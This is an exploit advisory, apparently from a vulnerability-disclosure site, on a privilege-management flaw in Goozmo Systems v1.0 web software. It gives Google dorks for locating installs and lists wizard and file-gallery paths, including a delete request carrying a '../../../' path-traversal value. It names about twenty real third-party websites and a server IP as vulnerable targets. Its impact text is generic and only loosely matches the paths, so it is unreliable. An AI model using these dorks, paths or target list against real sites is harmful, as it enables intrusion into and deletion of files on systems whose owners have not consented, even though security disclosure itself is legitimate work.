Goozmo™ Systems v.1.0 Improper Privilege Management

2019-01-30 / 2019-01-29

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-269

Dork: intext:''Goozmo™ Systems - v.1.0''

####################################################################

# Exploit Title : Goozmo™ Systems v.1.0 Improper Privilege Management
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : goozmo.com
# Software Information Link : goozmo.com/about-goozmo/
# Software Version : 1.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Goozmo™ Systems - v.1.0''
intext:©2000-2018 Goozmo™ Inc, All rights reserved.
www.goozmo.com | Printed on Recycled Data™
intext:© 2000 – 2019 Goozmo, Inc + Denver, Colorado Design, 
Strategy, Development, and Fun + Printed on Recycled Data™
# Vulnerability Type : CWE-269 [ Improper Privilege Management ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************

Goozmo Systems is the agency of web designers, web developers and fanatics of web apps.

####################################################################

# Impact :
***********

* The following versions of Goozmo™ Systems, a software management platform,

are affected : Goozmo™ Systems v.1.0

* This software Goozmo™ Systems v.1.0 does not properly assign, modify, 

track, or check privileges for an actor, creating an unintended sphere of control for that actor.

* Successful exploitation of this vulnerability could allow authenticated

system users to escalate their privileges under certain conditions.

* Authenticated, non-administrative local users are able to alter service

executables with escalated privileges which could allow an attacker to

execute arbitrary code under the context of the current system services.

Note : New installation of websites and one attacker has administrational authorization.

Note : If you add a note to one website - all websites affects at the same time.

####################################################################

# Privelege Escalation/Improper Privilege Management Exploit :
******************************************************
/goowizard/step_one.php

/goowizard/step_two.php

/goowizard/step_three.php

/goowizard/step_four.php

/goowizard/step_five.php

/goopages/pages_downloadgallery/addfile.php

/goopages/pages_downloadgallery/index.php

/goopages/pages_downloadgallery/addfile.php?edit=1&id=[ID-NUMBER]&galleryid=1

/file_archive/file_archive.php?user_id=&site_id=&file_spot=imgthree

/goopages/pages_downloadgallery/deletefile.php?id=[ID-NUMBER]&filename=[FILENAME]&image=../../../[FILENAME]

####################################################################

# Example Vulnerable Sites :
*************************

Note : Vulnerable IP Address => (104.196.11.136)

There are 191 domains hosted on this server.

[+] 10170orchidreserve.com/goopages/pages_downloadgallery/index.php =>

[ Proof of Concept ] => archive.is/DQUj9

[+] synergisticbuildingtechnologies.com/goowizard/step_one.php

[+] springerscustomcycles.com/goowizard/step_two.php

[+] artworkspottery.com/goowizard/step_three.php

[+] architecturalpartnership.com/goowizard/step_four.php

[+] anaturalbliss.com/goowizard/step_five.php

[+] 7480marshcove.com/goopages/pages_downloadgallery/addfile.php

[+] 6441riverpointeway.com/goopages/pages_downloadgallery/addfile.php

[+] threeiguanasbelize.com/goopages/pages_downloadgallery/addfile.php

[+] 2175ibisisleroad.com/goopages/pages_downloadgallery/addfile.php

[+] 2128milanocourt.com/goopages/pages_downloadgallery/addfile.php

[+] 13401oakmeade.com/goopages/pages_downloadgallery/addfile.php

[+] 13361marshlanding.com/goopages/pages_downloadgallery/addfile.php

[+] 13201marshlanding.com/goopages/pages_downloadgallery/addfile.php

[+] 13181oakmeade.com/goopages/pages_downloadgallery/addfile.php

[+] 13081sabalchase.com/goopages/pages_downloadgallery/addfile.php

[+] 13061sabalchase.com/goopages/pages_downloadgallery/addfile.php

[+] 13001brynwood.com/goopages/pages_downloadgallery/addfile.php

[+] 12981brynwood.com/goopages/pages_downloadgallery/addfile.php

[+] caninecampovers.com/goopages/pages_downloadgallery/addfile.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Goozmo™ Systems v.1.0 Improper Privilege Management

Dork: intext:''Goozmo™ Systems - v.1.0''

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.